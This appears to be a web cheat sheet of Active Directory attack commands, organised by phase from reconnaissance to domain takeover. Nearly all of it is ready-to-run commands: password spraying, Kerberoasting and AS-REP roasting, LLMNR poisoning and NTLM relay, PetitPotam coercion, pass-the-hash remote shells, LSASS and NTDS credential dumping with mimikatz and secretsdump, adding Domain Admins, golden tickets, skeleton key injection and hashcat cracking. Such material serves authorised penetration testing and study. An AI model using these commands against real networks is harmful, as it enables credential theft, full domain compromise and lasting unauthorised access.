Active Directory Cheat Sheet for 2025 – Essential Commands, Tips & Tools for SysAdmins & Security Pros

A complete Active Directory (AD) cheat sheet covering user management, enumeration, PowerShell, LDAP queries, and security tools. Ideal for red teamers, blue teamers, and IT admins in 2025

Scan Network & Initial Enumeration

This section covers initial network scanning to identify live hosts, open ports, and running services, with a focus on SMB.

Enumerate SMB hosts on a network range.

cme smb <target_range>

Ping scan to discover live hosts.

nmap -sP <target_range>

Quick scan for the top 50 ports on a specific host.

nmap -PN -sV --top-ports 50 --open <target_ip>

Search for common SMB vulnerabilities.

nmap -PN --script smb-vuln* -p139,445 <target_ip>

A classic, comprehensive scan for services and scripts.

nmap -PN -sC -sV <target_ip>

A full TCP port scan with service and script detection.

nmap -PN -sC -sV -p- <target_ip>

Scan for open UDP ports and services.

nmap -sU -sC -sV <target_ip>

Active Directory (AD) Discovery

Once you've identified potential targets, the next step is to enumerate Active Directory to understand the domain structure and find users.

Show network info, including the domain and DNS servers.

nmcli dev show <interface>

Find the domain controllers using a DNS query.

nslookup -type=SRV _ldap._tcp.dc._msdcs.<DOMAIN>

Attempt a DNS zone transfer to get all DNS records.

dig axfr @<dns_server> <domain>

Enumerate shares and users with a null session.

enum4linux -a -u "" -p "" <target_ip>

List SMB shares with guest access.

smbmap -u "guest" -p "" -P 445 -H <target_ip>

Enumerate domain users via an anonymous session.

cme smb <target_ip> -u '' -p '' --users

Enumerate LDAP information without brute-forcing.

nmap -n -sV --script "ldap* and not brute" -p 389 <target_ip>

Perform a basic search of the LDAP directory.

ldapsearch -x -h <target_ip> -s base

Gaining a Foothold: Common Attacks

This section details common attack vectors to gain initial access to a user account or system.

Password Spraying

Get the domain password policy.

cme smb <target_ip> -u '<user>' -p '<pass>' --pass-pol

Spray a list of passwords against a user list.

cme smb -u user.txt -p password.txt <target_ip>

AS-REP Roasting

Get crackable password hashes for users with Kerberos pre-authentication disabled.

GetNPUsers.py <domain>/ -usersfile <user_list> -format hashcat

BloodHound query to find AS-REP roastable users.

MATCH (u:User {dontreqpreauth:true})

Relaying and Poisoning

Find hosts that do not require SMB signing.

nmap --script smb-security-mode -p445 <target_range>

Poison LLMNR/NBT-NS to capture hashes.

responder -I <interface>

Relay captured credentials to other machines.

ntlmrelayx.py -tf targets.txt -socks -smb2support

Perform an IPv6 DNS takeover attack.

mitm6 -d <domain>

Coerce authentication from a machine for NTLM relay attacks.

PetitPotam.py -d <domain> <attacker_ip> <target_ip>

Post-Exploitation & Lateral Movement

Once you have credentials, these commands help you move through the network and escalate privileges.

With Valid Credentials

Get a list of all domain users.

GetADUsers.py -all -dc-ip <dc_ip> <domain>/<user>:<pass>

Enumerate accessible SMB shares with the user's credentials.

cme smb <target_ip> -u <user> -p <pass> --shares

Run the BloodHound collector to map the domain.

bloodhound-python -d <domain> -u <user> -p <pass> -gc <dc_ip> -c all

Kerberoasting

Get crackable hashes for service accounts.

GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<pass>

BloodHound query to find kerberoastable users.

MATCH (u:User {hasspn:true})

Pass the Hash / Key

Execute commands remotely using a user's NTLM hash.

psexec.py -hashes ':<nt_hash>' <user>@<target_ip>

Execute commands remotely via WMI with a hash.

wmiexec.py -hashes ':<nt_hash>' <user>@<target_ip>

Open an interactive remote shell using a hash.

evil-winrm -i <target_ip> -u <user> -H <nt_hash>

Execute commands using a Kerberos ticket (Pass the Key).

psexec.py <domain>/<user>@<target_ip> -k -no-pass

Domain Dominance

Techniques to achieve full control over the Active Directory domain.

Credential Dumping

Dump all domain hashes from the NTDS.dit file on a Domain Controller.

secretsdump.py <domain>/<user>:<pass>@<dc_ip>

Dump the LSASS process memory to extract cleartext passwords.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Parse the LSASS dump file to reveal credentials.

mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"

Remotely dump LSASS using CrackMapExec.

cme smb <target_ip> -u <user> -p <pass> -M lsassy

Persistence

Add a user to the Domain Admins group.

net group "domain admins" <user> /add /domain

Golden Ticket

Create a golden ticket to impersonate any user.

ticketer.py -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> <user>

Skeleton Key

Inject a skeleton key into LSASS, allowing a master password for all users.

mimikatz "privilege::debug" "misc::skeleton"

Hash Cracking

LM

hashcat -m 3000 -a 3 hash.txt

NTLM

hashcat -m 1000 -a 3 hash.txt

NTLMv2

hashcat -m 5600 -a 0 hash.txt rockyou.txt

Kerberos 5 TGS

hashcat -m 13100 -a 0 spn.txt rockyou.txt

Kerberos AS-REP

hashcat -m 18200 -a 0 hashes.txt rockyou.txt